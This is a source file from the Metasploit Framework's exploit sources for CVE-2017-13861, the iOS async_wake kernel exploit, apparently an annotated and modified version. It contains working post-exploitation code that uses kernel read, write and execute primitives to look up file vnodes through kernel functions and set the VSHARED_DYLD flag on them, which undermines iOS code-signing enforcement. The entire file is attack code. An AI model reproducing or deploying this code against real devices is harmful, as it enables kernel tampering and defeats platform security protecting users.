GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/vnode_utils.m
//
// *.c
// async_wake_ios
//
// Created by George on 18/12/17.
// Copyright © 2017 Ian Beer. All rights reserved.
//
#import <stdlib.h>
#import "kernel_utils.h"
#import "patchfinder64.h"
#import "kexecute.h"
#import "offsetof.h"
#include "liboffsetfinder64/getoffsets.h"
#import <Foundation/Foundation.h>
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
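/// Resolves `path` to a kernel vnode pointer by invoking the kernel's vnode_lookup
/// through Kernel_Execute.
///
/// Two kernel buffers are used: one holding the NUL-terminated path string and one
/// 8-byte slot that receives the vnode pointer. Both are released on every exit path
/// (the original leaked both when Kernel_Execute reported failure).
///
/// @param path        NUL-terminated path to look up. Must not be NULL.
/// @param flags       Passed straight through to vnode_lookup.
/// @param vnode       Out-parameter receiving the vnode pointer on success; left
///                    untouched on failure. Must not be NULL.
/// @param vfs_context Kernel vfs_context pointer (see get_vfs_context).
/// @return 0 on success, -1 on invalid arguments or a non-zero result from Kernel_Execute.
int vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {
    if (path == NULL || vnode == NULL) {
        return -1;
    }

    size_t path_len = strlen(path) + 1;  // include the terminating NUL
    uint64_t out_slot = Kernel_alloc(8);
    uint64_t kpath = Kernel_alloc(path_len);
    KernelWrite(kpath, path, path_len);

    int rc = 0;
    if (Kernel_Execute(find_symbol("_vnode_lookup") + get_kernel_slide(),
                       kpath, flags, out_slot, vfs_context, 0, 0, 0)) {
        rc = -1;  // kernel side reported failure; do not touch *vnode
    } else {
        *vnode = KernelRead_64bits(out_slot);
    }

    // Free unconditionally so the failure path no longer leaks kernel memory.
    Kernel_free(kpath, path_len);
    Kernel_free(out_slot, 8);
    return rc;
}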
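/// Returns the current kernel vfs_context by invoking vfs_context_current through
/// Kernel_Execute; the raw return value is passed through ZmFixAddr before use.
///
/// Declared with an explicit `(void)` prototype instead of the original empty `()`
/// declarator, which is compatible with existing callers and declarations.
///
/// @return The vfs_context pointer to hand to vnode_lookup.
uint64_t get_vfs_context(void) {
    uint64_t target = find_symbol("_vfs_context_current") + get_kernel_slide();
    // First argument is 1 in the original; its meaning is not established here — TODO confirm.
    return ZmFixAddr(Kernel_Execute(target, 1, 0, 0, 0, 0, 0, 0));
}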
/// Releases the reference on `vnode` by invoking the kernel's vnode_put through
/// Kernel_Execute.
///
/// @param vnode Kernel vnode pointer previously obtained from vnode_lookup or
///              get_vnode_at_path.
/// @return The value returned by Kernel_Execute, truncated to int.
int vnode_put(uint64_t vnode) {
    uint64_t target = find_symbol("_vnode_put") + get_kernel_slide();
    return (int)Kernel_Execute(target, vnode, 0, 0, 0, 0, 0, 0);
}
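/// Convenience wrapper around vnode_lookup: looks up `path` with flags 0 in the
/// current vfs_context.
///
/// The original heap-allocated an 8-byte slot (unchecked malloc) for the out-parameter;
/// a stack variable serves the same purpose without the allocation or the free calls.
///
/// @param path NUL-terminated path to look up.
/// @return The vnode pointer, or (uint64_t)-1 if the lookup failed. Callers compare
///         the result against -1 (see fix_vnode_for_mmap).
uint64_t get_vnode_at_path(const char *path) {
    uint64_t vnode = 0;
    if (vnode_lookup(path, 0, &vnode, get_vfs_context())) {
        return (uint64_t)-1;
    }
    return vnode;
}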
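// VSHARED_DYLD bit in the vnode v_flags field (value as used by this file).
#define VSHARED_DYLD 0x000200

/// Sets the VSHARED_DYLD bit in the v_flags field of the vnode at `path`.
///
/// Changes from the original: the flags are read back for the return value *before*
/// the lookup reference is dropped with vnode_put (the original read the vnode after
/// releasing it), and the log message no longer carries its own trailing newline,
/// which LOG already appends.
///
/// @param path NUL-terminated path whose vnode is modified.
/// @return -1 if the vnode could not be looked up; otherwise the VSHARED_DYLD bit as
///         read back from v_flags (non-zero if the write took effect, 0 if it did not).
int fix_vnode_for_mmap(const char *path) {
    uint64_t vnode = get_vnode_at_path(path);
    if (vnode == (uint64_t)-1) {
        LOG("[-] Unable to fix mmap of path: %s", path);
        return -1;
    }

    uint32_t v_flags = KernelRead_32bits(vnode + off_v_flags);
    KernelWrite_32bits(vnode + off_v_flags, v_flags | VSHARED_DYLD);

    // Verify while the reference from the lookup is still held, then release it.
    int result = (int)(KernelRead_32bits(vnode + off_v_flags) & VSHARED_DYLD);
    vnode_put(vnode);  // return value ignored, as in the original

    return result;
}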